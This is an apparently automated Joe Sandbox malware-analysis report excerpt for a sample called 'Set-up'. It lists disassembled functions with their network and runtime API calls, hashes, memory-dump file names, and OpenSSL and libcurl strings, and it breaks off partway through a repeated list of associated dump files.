Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 6ccad3f8ea12a280c5160a9f72ca00269fb6c957eacd3625fa77d51fe40bbf03
Instruction ID: adc858495db40d1c48cde8775efcb8912a8a7c3e50febb88dc9762aed8663e4c
Opcode Fuzzy Hash: 6ccad3f8ea12a280c5160a9f72ca00269fb6c957eacd3625fa77d51fe40bbf03
Instruction Fuzzy Hash: 19018F75B00714AFC6148F15DC45F56BBA5FF84720F06825DEA986B361C331AC158B92

Function 008CA870 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(000000FF,008B6F4E,000000FF,00000000), ref: 008CA8AF

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: adf642d950ba3cc38e301ee3217159f86e8ff7c69a333b83df6cf24b2fe0fe58
Instruction ID: 9e5a85da945657f9ea0205e6e7522869cf2cdf7201f8d989528e43a7ef74af13
Opcode Fuzzy Hash: adf642d950ba3cc38e301ee3217159f86e8ff7c69a333b83df6cf24b2fe0fe58
Instruction Fuzzy Hash: 1DF01C76B047206FD5248A18EC05F9BF369FBC4B20F148959B954672488370BC4186E2

Function 008CB020 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 008CB04C

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 3c7fb29559e7cbe271b549956dc72565217e5d16a910bb5c39a8359328f683af
Instruction ID: ddd7af7b6fc7ccc962409cedbb14708d131b14f719ae45bcc8379fc6057a4c3b
Opcode Fuzzy Hash: 3c7fb29559e7cbe271b549956dc72565217e5d16a910bb5c39a8359328f683af
Instruction Fuzzy Hash: 5BE0EC74A00A019BCE149A54C989F57777BBFC0721F68CA6CF42C8A555D73ADC47CA41

Function 008667E0 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,8004667E), ref: 008667FB

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 63f121ec62c4a9929db000366966e9d3e5edc6a57f0ede87b3c8c51af83cbc6c
Instruction ID: 49fdd38025a12a5e6c9c15b25b772995ffd80ed00cfcea7e30926d42522d9e3c
Opcode Fuzzy Hash: 63f121ec62c4a9929db000366966e9d3e5edc6a57f0ede87b3c8c51af83cbc6c
Instruction Fuzzy Hash: 11C012F5108200EFCB084B25D849A5E7BE9EB48296F01441CF046D2150DB749494CF16

Function 008B9270 Relevance: 1.4, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 008BA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA499
Part of subcall function 008BA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA4FB
Part of subcall function 008BA440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008BAA19

Part of subcall function 008B9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,008B92A4,?,?,?,?,?,?,?,?,00000000), ref: 008B9B6E
Part of subcall function 008B9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,008B4860,00000000), ref: 008B9C24

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 008B93C3

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: AdaptersAddressesgetenv$Openmemcpy
String ID:
API String ID: 1905038125-0
Opcode ID: 7ee6c6c7a25f6438dbf64c27108be7382d85b42e97bc443f9162898e73fdbf1a
Instruction ID: 00db2e0b4725cb8ef9c8cc9e56c7ea9da659cbcc25b442a2242c78680dbeb448
Opcode Fuzzy Hash: 7ee6c6c7a25f6438dbf64c27108be7382d85b42e97bc443f9162898e73fdbf1a
Instruction Fuzzy Hash: DB51A071904302ABD714DF25D985BAABBE0FF98354F08052CF989D2761E731E865CB83

Function 009DC9B0 Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(009B72D8,00000000,?,?,009B72D8,00000001,00000000,00000000,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000), ref: 009DC9FA

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 4b61db7c62ad0173e3f5e236331c800b014b9ea971895db9147449cb7250d83f
Instruction ID: f6c461f9f9621e2d4c2b5e5a7538447c8610bf549001c471f0d493330844d419
Opcode Fuzzy Hash: 4b61db7c62ad0173e3f5e236331c800b014b9ea971895db9147449cb7250d83f
Instruction Fuzzy Hash: B7012BE234634227D620A6F57C86F8B57CD8BD1734F180437F944D2342D6959858C272

Function 00C98260 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00C932B0,?,?,?,?,?,00C92C31), ref: 00C98271

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b6d5a9f585fa3189ad274739540e8b5b277fbfcf119cf5520e18d3d34147108a
Instruction ID: 03070abd870d33723ecb1449396993be71797e14c8e58c75c95cab57b06a9ae4
Opcode Fuzzy Hash: b6d5a9f585fa3189ad274739540e8b5b277fbfcf119cf5520e18d3d34147108a
Instruction Fuzzy Hash: 56D0A9B19047048BCB00BFA888C140A33E8BBA5314FC406ECED841B202EB399A18C7C2

Function 009DCBC0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,009B7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,009B40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009DCBD2

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9d609a74fcedf90792147ca3cb2e70398825d5edfd1f5f2803843c158542cadd
Instruction ID: 040345917b0f3edd4a78140ec074391b397742ac70c5830c268c35595fc3f4b9
Opcode Fuzzy Hash: 9d609a74fcedf90792147ca3cb2e70398825d5edfd1f5f2803843c158542cadd
Instruction Fuzzy Hash: 8BB022A20802008BE2022220BA8382A32A2E280300FE08833F000C02B2C328CC00E202

Non-executed Functions

Function 008762E0 Relevance: 123.9, APIs: 9, Strings: 72, Instructions: 2363stringCOMMON

Download Yara Rule

APIs

strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00876E74
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00876F8A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00877184
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00877263
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 008775B8

Part of subcall function 009CF870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 009CF8AE

Strings

SSL: could not get X509-issuer name, xrefs: 008772C2
expire date: %.*s, xrefs: 008770E2
Cert, xrefs: 00876D7F
SSL: could not get peer certificate, xrefs: 00876FD5
pub_key, xrefs: 00876AD6, 00876BC4
ipv6 address, xrefs: 00877AD7
Error computing OCSP ID, xrefs: 0087806E
%s/%s, xrefs: 00876E01, 008778D8
pqg, xrefs: 00876A29, 00876A7E, 00876B13, 00876B6C
Serial Number, xrefs: 008765F1
unexpected ssl peer type: %d, xrefs: 00877621
Could not find certificate ID in OCSP response, xrefs: 0087840A
SSL: certificate subject name '%s' does not match target hostname '%s', xrefs: 00878133
Error getting peer certificate, xrefs: 00878153
OpenSSL, xrefs: 00876DFC, 008778D3
Could not get peer certificate chain, xrefs: 00878122
Signature Algorithm, xrefs: 008766A6
Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s, xrefs: 0087736B
SSL: no alternative certificate subject name matches target %s '%s', xrefs: 00877B2A
SSL: Unable to open issuer cert (%s), xrefs: 00877232
OCSP response verification failed, xrefs: 0087814C
Invalid OCSP response, xrefs: 00877D4B, 008780B1
subjectAltName: host "%s" matched cert's IP address!, xrefs: 00877607
SSL certificate revocation reason: %s (%d), xrefs: 008783F1
/%s, xrefs: 00877489, 00877741
ipv4 address, xrefs: 00877AD2
SSL certificate issuer check ok (%s), xrefs: 00877CAF
subjectAltName: host "%s" matched cert's "%s", xrefs: 008780EC
SSL: Certificate issuer check failed (%s), xrefs: 00877867
Unable to load public key, xrefs: 008769DB
%02x, xrefs: 008765C8
SSL: Unable to read issuer cert (%s), xrefs: 00877995
subjectAltName does not match %s %s, xrefs: 00877B11
SSL: illegal cert name field, xrefs: 00878078
BIO_new_mem_buf NULL, OpenSSL error %s, xrefs: 00877954
<, xrefs: 00877F90
issuer: %s, xrefs: 008771CE
SSL certificate verify ok., xrefs: 0087809E
OCSP response has expired, xrefs: 00878414
: , xrefs: 008778FE
Version, xrefs: 0087654F
No OCSP response received, xrefs: 008779D8
vtls/openssl.c, xrefs: 00877BD2, 00877F54, 00878217, 00878278, 00878293
[NONE], xrefs: 00877011
SSL: public key does not match pinned public key, xrefs: 008782B2
Invalid OCSP response status: %s (%d), xrefs: 008777F8
start date: %.*s, xrefs: 0087707C
SSL certificate status: %s (%d), xrefs: 008783B6
Issuer, xrefs: 008764EF
%02x:, xrefs: 00876CE8
common name: %s (matched), xrefs: 00877F17
Proxy, xrefs: 00876F01
No error, xrefs: 00876E65, 0087793C
SSL: unable to obtain common name from peer certificate, xrefs: 00877F29
Unknown error, xrefs: 00876E6A, 00876E72, 00877941, 00877949
hostname, xrefs: 00877AE1, 00877B10, 00877B29
Remove session ID again from cache, xrefs: 00877DD4
Subject, xrefs: 0087648C
subject: %s, xrefs: 00877021
SSL certificate verify result: %s (%ld), continuing anyway., xrefs: 00877D38
Signature, xrefs: 00876D1F
Expire date, xrefs: 008768EE
%lx, xrefs: 00876524
rsa, xrefs: 00876C56, 00876C75
%s certificate:, xrefs: 00876F11
RSA Public Key, xrefs: 00876C31
BIO_new return NULL, OpenSSL error %s, xrefs: 00876E7D, 00877E52
dsa, xrefs: 00876B71, 00876B90, 00876BAE, 00876BC9
Public Key Algorithm, xrefs: 00876725
SSL certificate verify result: %s (%ld), xrefs: 00877FB0
Start date, xrefs: 00876887
Server, xrefs: 00876F06, 00876F10

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpy$memcmpmemsetstrcpystrlen
String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
API String ID: 838718518-248801092
Opcode ID: a124f9134ef52feb7ca31ed8e4e7acaa8f3081e823bc935e239b5048f25398c3
Instruction ID: 0fe65ffdc9975985e34cf558f40b5f22332fe5af39cc53826770dcc43e7f78a9
Opcode Fuzzy Hash: a124f9134ef52feb7ca31ed8e4e7acaa8f3081e823bc935e239b5048f25398c3
Instruction Fuzzy Hash: 2C03D6B6A083446BE720AB10AD42B7B7698FF91708F088438FD4DA6257F771E954C793

Function 00B8E050 Relevance: 119.3, APIs: 64, Strings: 3, Instructions: 2082COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00B8E0B3
localeconv.MSVCRT ref: 00B8E0BE
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00B8E149
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00B8E179
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B8E1D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B8E1FA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B8E20F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B8F886

Strings

nil), xrefs: 00B9041D
, xrefs: 00B8FED0
d, xrefs: 00B8EAAF

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: free$isspacelocaleconv$_errno
String ID: $d$nil)
API String ID: 577766270-394766432
Opcode ID: 0127d8719aa5fd9127262ba43b24c2be0daeb2e74186e9fb90f32af2b7d9d853
Instruction ID: e550f8b69148920785624591448f18f05b8c7b8abcec79e5e42a7d8aa6c86c6a
Opcode Fuzzy Hash: 0127d8719aa5fd9127262ba43b24c2be0daeb2e74186e9fb90f32af2b7d9d853
Instruction Fuzzy Hash: 83136B706083428FD720EF28C08462ABBE1FFD9354F6449ADE9A59B361D771ED45CB82

Function 0084E480 Relevance: 91.8, APIs: 25, Strings: 27, Instructions: 803COMMON

Download Yara Rule

Strings

[%s] -> [%s], xrefs: 0084C2D2, 0084C3D2, 0084C596, 0084E45F, 0084E4FF, 0084E56E, 0084E662, 0084EA61
bind(port=%hu) on non-local address failed: %s, xrefs: 0084EBC6
PRET, xrefs: 0084E656
EPRT, xrefs: 0084EF42
Failure sending EPRT command: %s, xrefs: 0084EF6C
RETR_PREQUOTE, xrefs: 0084E562
[%s] ftp_state_use_port(), socket bound to port %d, xrefs: 0084ED32
[%s] ftp_state_use_port(), opened socket, xrefs: 0084EAE2
NLST, xrefs: 0084E5F6, 0084E5FE
%s %s, xrefs: 0084EEDC
STOP, xrefs: 0084C3C6, 0084EA55
getsockname() failed: %s, xrefs: 0084E905, 0084EC1B
bind() failed, we ran out of ports, xrefs: 0084EB15
???, xrefs: 0084EADC, 0084EAE1, 0084ED2B, 0084ED31, 0084ED96, 0084ED9C
PRET STOR %s, xrefs: 0084E607
[%s] ftp_state_use_port(), listening on %d, xrefs: 0084ED9D
socket failure: %s, xrefs: 0084E9D5
Failure sending PORT command: %s, xrefs: 0084EF05
,%d,%d, xrefs: 0084EEBF
PRET %s, xrefs: 0084E5FF
PORT, xrefs: 0084EED7
%s |%d|%s|%hu|, xrefs: 0084EF47
PRET RETR %s, xrefs: 0084E5D9
failed to resolve the address provided to PORT: %s, xrefs: 0084E9DD
REST %d, xrefs: 0084E4A6
bind(port=%hu) failed: %s, xrefs: 0084ED00
LIST, xrefs: 0084E5F1

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
